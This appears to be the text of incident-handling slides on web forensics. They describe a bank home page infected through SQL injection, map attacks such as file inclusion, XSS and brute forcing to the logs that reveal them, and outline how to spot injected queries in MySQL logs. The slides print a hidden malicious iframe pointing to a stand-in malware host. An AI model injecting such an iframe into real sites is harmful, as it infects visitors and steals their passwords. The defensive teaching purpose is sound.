Attacker compromised the site and injected an <iframe tag> in the home page. The iframe tag pointed to an external website that was hosting malware. When a user visited the bank's site, the home page downloaded the malware in the background and infected the browser. The malware would steal passwords the user types in and will mail the attacker.
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore
Obtain sensitive information from other internal machines
A common attack vector --- SQL Injection
A sample incident: Malware Download / Visit Phishing sites
SQL Injection to change values in the backend DB
Values changed to known malware distributing sites
Each time page loads - Malware downloaded
Multiple systems under attacker control
Web site distributes malware http://bank.com/homepage.jsp Exploits and Adds iframe Tag <iframe src =“http://malware.com/malware"> </iframe> in page http://bank.com/homepage.jsp Infected page Access request http://bank.com/homepage.jsp Infected page served to user Accesses http:// bank.com/homepage.jsp and finds out vulnerabilities Home Page gets infected Connection made to external site and malware gets downloaded in background User <html> <body> . . . . <iframe src =“http://malware.com/malware"> </iframe> . . </body> </html> UserID & Pswd
A glimpse of major attacks for which forensics can be done by different sets of logs:
Directory Traversal Attack
PHP Remote File Inclusion Attack
Upload Malicious Files
Unwanted Apps/Directories open to Internet
Misusing link for activation/authentication
Enumerating Data based on error messages/app features
Response Splitting Attack
Arbitrary HTTP methods allowed
Mapping Attack patterns to Logs OS Logs Physical access to the server and copying data on removable media Network Device Logs (Firewall + Switch) Compromise of another server and gain access to this server through a vulnerability there or by trust abuse of that server Web Logs/OS Logs/Database Logs File upload of malicious file Individual Network Service Logs Identification of all other network services and check if any other way in Application Logs/Database Logs Vulnerability inside the application which allows DB backup/restore Web Logs/OS Logs/Database Logs Upload an executable which will take a backup of the database and dump it out OS Logs Brute forcing SAM file , RDP in and stealing database Web Logs Files available on the website found through directory browsing Database Logs/OS Logs Direct connection to the Database and retrieve data FTP Logs Anonymous FTP / brute force passwords and steal backup stored Web Logs/Database Logs PHP Code Injection to retrieve database password Web Logs/Source Code PHP Local and Remote File inclusion to obtain source code and passwords Web Logs/Database Logs/Database Backup Persistent XSS on website Web Logs/Database Logs SQL Injection in the application injecting Iframe into database Web Logs/Database Logs SQL Injection in the application retrieving data
Obtain the Query Logs. They are generally available in ‘/mysql/data/’
Do a Code Review of the application and list down all the SQL queries from all pages on the application.
Match all the Queries in the Query Log with those obtained from code review. All queries which match are valid queries. The rest are invalid queries. Store all these invalid queries in a separate file as these are most probably the queries that an attacker used for SQL Injection.